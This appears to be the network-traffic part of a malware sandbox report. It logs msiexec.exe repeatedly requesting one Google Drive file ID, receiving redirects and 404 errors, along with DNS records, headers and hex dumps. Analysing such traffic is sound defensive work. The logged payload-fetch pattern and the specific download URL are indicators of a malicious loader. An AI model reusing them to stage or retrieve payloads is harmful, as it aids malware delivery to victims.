                                                                            Dec 3, 2024 16:45:02.765393019 CET44349739142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:45:04.550244093 CET44349739142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:45:04.550528049 CET49739443192.168.2.9142.250.181.1
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 3, 2024 16:43:47.133393049 CET5393453192.168.2.91.1.1.1
                                                                            Dec 3, 2024 16:43:47.273042917 CET53539341.1.1.1192.168.2.9
                                                                            Dec 3, 2024 16:43:50.036622047 CET5152653192.168.2.91.1.1.1
                                                                            Dec 3, 2024 16:43:50.265825987 CET53515261.1.1.1192.168.2.9
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 3, 2024 16:43:47.133393049 CET192.168.2.91.1.1.10x10e4Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 16:43:50.036622047 CET192.168.2.91.1.1.10x5fccStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 3, 2024 16:43:47.273042917 CET1.1.1.1192.168.2.90x10e4No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 16:43:50.265825987 CET1.1.1.1192.168.2.90x5fccNo error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                            • drive.google.com
                                                                            • drive.usercontent.google.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.949709172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:43:49 UTC216OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            2024-12-03 15:43:50 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:43:49 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: script-src 'nonce-eh8L6dLPZEBdViLZilJweQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.949710142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:43:51 UTC258OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-03 15:43:52 UTC2229INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:43:52 GMT
                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy: script-src 'nonce-ABLVDx_RIDQIwWAxcW5SDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC6N0MqpgTr3mXmL3BvIcKc5K-Bnu30U2byoJ1Vhe3LDKvgHB3raoW9g6t0fNZAPw31eIc2ebdjcVg
                                                                            Server: UploadServer
                                                                            Set-Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ; expires=Wed, 04-Jun-2025 15:43:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:43:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 73 65 6c 42 34 4e 65 7a 61 75 65 4f 73 70 51 30 65 70 33 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7selB4NezaueOspQ0ep3Yg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.949711172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:43:54 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:43:55 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:43:55 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-G6Dm74XcAsQV_bO9BU8snQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.949712142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:43:57 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:43:58 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:43:58 GMT
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Security-Policy: script-src 'nonce-U_DTX1rNqJiHhLT7MhQq7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC7FRv6YdSB9wL2xR-zxuYwWjCyK_34fidWYGc4vRRF5NUJOb5b2SMf_0R2FzYY-tXDI_P7qxYvwrQ
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:43:58 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 76 64 56 57 69 38 78 62 36 6e 54 6c 4b 31 76 6e 4a 79 7a 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0vdVWi8xb6nTlK1vnJyzgw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.949714172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:00 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:01 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:01 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-2uw2sFvyaD_T7d8IU1vgKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.949715142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:03 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:04 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:03 GMT
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy: script-src 'nonce-QcdGmAdYilxKAr-VRYYgHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC7_P4xXhXBDLn0pqycST3WC2yXWEcpb6KiyW0aQ677lJcxTLOFygHUCqcS513hg462eiJxiFvunwg
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 65 6e 57 4c 41 4e 58 75 58 65 75 47 4e 39 53 52 63 55 48 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1enWLANXuXeuGN9SRcUH1g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.949716172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:06 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:06 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:06 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: script-src 'nonce-v5DSUWoIfXJD5OULPQZCsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.949717142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:08 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:09 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:09 GMT
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
